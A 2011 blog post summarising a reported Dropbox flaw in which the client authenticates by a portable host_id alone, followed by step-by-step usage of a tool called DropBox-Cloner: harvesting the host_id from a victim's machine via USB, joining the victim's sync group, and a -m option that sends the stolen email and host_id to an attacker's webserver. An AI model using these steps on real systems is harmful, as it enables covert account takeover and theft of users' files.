Monday, April 11, 2011

DropBox Cloner.

Hi Folks,
today I went through this interesting article from Derek Newton. He claims that Dropbox authentication is insecure by design since it uses a very primitive host authentication. He wrote (9 April 2011):

After some testing (modification of data within the config table, etc) it became clear that the Dropbox client uses only the host_id to authenticate. Here’s the problem: the config.db file is completely portable and is *not* tied to the system in any way. This means that if you gain access to a person’s config.db file (or just the host_id), you gain complete access to the person’s Dropbox until such time that the person removes the host from the list of linked devices via the Dropbox web interface. Taking the config.db file, copying it onto another system (you may need to modify the dropbox_path, to a valid path), and then starting the Dropbox client immediately joins that system into the synchronization group without notifying the authorized user, prompting for credentials, or even getting added to the list of linked devices within your Dropbox account (even though the new system has a completely different name) – this appears to be by design. Additionally, the host_id is still valid even after the user changes their Dropbox password (thus a standard remediation step of changing credentials does not resolve this issue).





Searching a little bit more informations on the described attack I came across to an early attack implementation (by Moloch) available through dropbox too ... (ha ha ha).

Clone any Dropbox in 5 Easy Steps thanks to DrobBox-Cloner.
  1. Find a victim machine running Dropbox, insert your USB drive
  2. Run dbClone.exe, data will be saved in a .txt file
  3. On your own computer install the dropbox client and run "dbClone.exe -i"
  4. Paste in the 'hostid' from the .txt file into the 'hostid' prompt, enter /any/ email
  5. Start up the Dropbox client, and sync all the files!!!

But Wait There's More!:
Use -m to upload the email and hostid to your webserver (via GET), for example "dbClone.exe -m http://somesite.com" (Note is appends "mothership.php" to the url), example code in /src/mothership.php!

The software is a python script that uses pytoexe libraries to build a standalone PE working pretty well under windows environments. It has been tested on Windows 7, WinXP and Ubunto 10.10, but of course being python based it should run without any big problems on most of the known platforms. Great job guys !

4 comments:

Mike said...

Great article sir. Application level security would be nice in commercial products. However, until management at software companies gets on the clue train regarding security then we'll see this type of issue reoccurring. It only took Microsoft 10+ years, so maybe the cycle will be shorter now.

flytouch 3 said...

Really effective data, thanks so much for this article.

hermes kelly 35 said...

Good job. thanks.

Mercedes - Clases de Yoga said...

Excellent advice. I use Dropbox, serve me greatly. Thank you